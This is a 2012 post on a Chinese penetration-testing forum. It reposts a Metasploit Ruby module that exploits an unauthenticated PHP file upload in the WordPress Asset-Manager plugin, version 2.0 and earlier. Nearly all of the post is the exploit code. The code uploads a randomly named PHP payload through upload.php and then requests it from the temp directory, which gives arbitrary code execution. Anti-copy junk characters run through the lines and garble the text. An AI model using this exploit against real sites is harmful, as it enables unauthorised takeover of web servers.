找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 WordPress Asset-Manager PHP文件上传漏洞
返回列表 发新帖
查看: 2406|回复: 0
打印 上一主题 下一主题

WordPress Asset-Manager PHP文件上传漏洞

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-12-31 09:22:33 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
这个模块利用Metasploi脆弱漏洞库在WordPress版本Asset-Manager插件2.0以及以下版本发现的。允许上传php文件、一用户可以上传一个文件到一个临时目录没有身份验证,从而导致执行任意代码。8 \" p4 _9 l5 B5 O

( _8 m% }* a9 y  t1 o##1 K1 c- e; ?, \! T7 z. g
# This file is part of the Metasploit Framework and may be subject to
8 }: T2 k7 c7 M5 ^" U6 X; r# redistribution and commercial restrictions. Please see the Metasploit0 j  J2 c  c1 N: l5 e
# Framework web site for more information on licensing and terms of use.7 s: n* c' L  t8 v9 L
#   http://metasploit.com/framework// T3 l7 V0 m3 [- R
##
  o0 a9 ~( {: `1 V 9 R: n5 n. G4 \9 Y
require 'msf/core', ^- A0 V0 `5 A- o3 K
require 'msf/core/exploit/php_exe'* z" ~( A2 C% \# _4 \

" N9 E' l, E8 i7 G& P$ [2 H& Wclass Metasploit3 < Msf::Exploit::Remote
1 \6 N$ D5 l- o1 f# Y  Rank = ExcellentRanking% w0 r( L; R; Q: r4 r

2 X' C- Q9 L# h  include Msf::Exploit::Remote::HttpClient
# W8 R  c+ F2 m( x  include Msf::Exploit:hpEXE/ }1 ^. y' m# J1 |; T: _

8 Q. e. {& M8 [$ W5 d9 ]  def initialize(info = {})+ c2 s: o. O3 L5 f
    super(update_info(info,! ?4 I$ {) w$ f- a
      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',
2 y8 K; V0 U0 d7 p3 q      'Description'    => %q{6 b8 o$ x+ v' ]% X: j
        This module exploits a vulnerability found in Asset-Manager <= 2.0  WordPress: [6 _8 d' G4 W- n2 ^
        plugin.  By abusing the upload.php file, a malicious user can upload a file to a* d1 a6 V- X4 \
        temp directory without authentication, which results in arbitrary code execution.
2 @% |, ]! S; J: D7 R2 r      },
5 w7 j6 i9 A4 k3 f      'Author'         =>$ T2 Q8 t4 |7 x# O( l5 \! d
        [
  {; R7 S) A  O6 a5 V* c5 U: p          'Sammy FORGIT', # initial discovery( Z$ ~4 l; r2 u3 p
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
& P* a2 j0 u4 z, U        ],% K6 ~) K, o6 X, @' N$ P7 V
      'License'        => MSF_LICENSE,& O" ^5 I, }( E* G
      'References'     =>
5 x: `; d  h  p3 ?: P        [" ?9 }( x$ i7 t: i) Z
          [ 'OSVDB', '82653' ],
" |! U2 P% y3 _) z  z/ V1 ?' Y5 W          [ 'BID', '53809' ],
2 ^- {! r# e% s- @. X" @; w! s, @          [ 'EDB', '18993' ],5 y/ l3 d& o+ R& H$ G4 p4 ]
          [ 'URL', 'http:// www.myhack58.com /' ]
8 X1 g9 k- u6 v        ],
- T. X6 @  M- }/ W" n7 @. T. [4 d      'Payload'       =>
  ~: k$ n/ o, E# Z5 x0 Q( R8 K, b        {
1 H& F9 Y$ \1 D, {1 d, h          'BadChars' => "\x00",
: P. O/ j( g9 e0 n3 U        },
$ j% M) \* `7 d2 v) @      'Platform'       => 'php',
+ Q' [8 I: o8 R) g      'Arch'           => ARCH_PHP,
! F  C/ i( R7 _      'Targets'        =>
( c: r$ q( x4 D4 |  t        [
1 @' ~( P, f# S) y7 A          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],# @1 w9 V0 {/ {* A1 }5 E
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]4 x. z2 d8 v" ~& E9 d
        ],
' l' v# S( s' K" i. L; k      'DefaultTarget' => 0,) G4 C' R5 i7 H
      'DisclosureDate' => 'May 26 2012'))4 P: q* ^2 d4 q  t% C

) Q/ }& N; U6 S0 F    register_options(
# N! o# y; f, P: e5 l7 j' }7 u      [7 _+ ]/ ]; p4 z0 ^
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
; l- _. C( q: d5 v# M$ ^      ], self.class)
0 p, h' W: x$ m! E/ L* ?" t  end
4 O: K. D8 s, k# `( c4 z& j
- b, E; h0 e5 j. V2 B  f  def exploit. P1 {* r. Q; u2 A  j  S; \9 m
    uri =  target_uri.path( x' O8 d. F- T) B* x
    uri << '/' if uri[-1,1] != '/'( n% \! J7 M, V& ~7 @6 C+ t! z
    peer = "#{rhost}:#{rport}"
, p: B  a% u/ p7 I& ~" _0 ^4 x    payload_name = "#{rand_text_alpha(5)}.php"* w. m" S) _- ^6 V9 g
    php_payload = get_write_exec_payload(:unlink_self=>true)
  Z. ]* ]6 V- A" a 4 O2 w4 s, ]( _# `" U* C
    data = Rex::MIME::Message.new
1 H+ k6 p5 H7 g' \    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
7 Z1 a: H$ `5 B2 O    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')9 a+ M, P! @- ^( h; l& i' u

% X  a# p; s; T6 _    print_status("#{peer} - Uploading payload #{payload_name}")
" _0 K( s8 ?* l: u% r8 D    res = send_request_cgi({  p' k) t$ r* R, r3 t0 D5 y
      'method'  => 'POST',* P; a1 S9 E- @
      'uri'     => "#{uri}wp-content/plugins/asset-manager/upload.php"," a/ D; S# b) e" h# }
      'ctype'   => "multipart/form-data; boundary=#{data.bound}",
$ R& O  H8 p% _4 f. Q( e      'data'    => post_data0 X4 S0 U: R# K+ V- a
    }): h' P$ G% P& V+ V
: `# N; ?# ~" }9 ^
    if not res or res.code != 200 or res.body !~ /#{payload_name}/
8 J8 i6 Y& R  p  W      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")2 `- X, z* G6 s" M: m( Y$ h1 W
end$ h9 R0 T' `4 [
4 ~. O( k) I  ?
    print_status("#{peer} - Executing payload #{payload_name}")
/ n4 n! x; E3 o* B    res = send_request_raw({
7 R( Q$ K- w% y      'uri'     => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",
, W: W+ R" [6 V' r  u& p      'method'  => 'GET'
/ {; Y* H! T) P: ~! R    })  h4 n7 Y5 p4 X* Y, R7 h

( H* Y! j7 e1 X% m    if res and res.code != 200
( ?" l$ r8 o$ m9 [, p      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")& N1 [. P3 Y7 B/ G9 i! Q+ N
    end
$ v2 }* U) H6 I% G5 j7 W: p6 m  end
8 L8 g1 P& d% R: i- I6 [: O7 b& Vend
( @; Z- t: X: t
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表